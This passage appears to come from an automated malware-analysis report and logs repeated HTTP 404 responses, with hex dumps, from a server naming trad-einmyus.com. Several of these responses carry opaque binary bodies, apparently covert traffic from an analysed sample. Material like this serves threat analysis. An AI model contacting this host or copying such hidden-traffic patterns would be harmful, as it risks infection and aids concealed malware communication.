6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73\|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82O@c^`_S10
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 90 51 10 25 01 f1 a0 89 b3 bf 05 ab 11 df 76 be 59 51 96 01 bf ea 26 ed 65 5e 12 b3 f2 92 4a f5 04 0d 0a 30 0d 0a 0d 0a Data Ascii: 35I:82OQ%vYQ&e^J0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73\|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OCxobz5-?FP0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 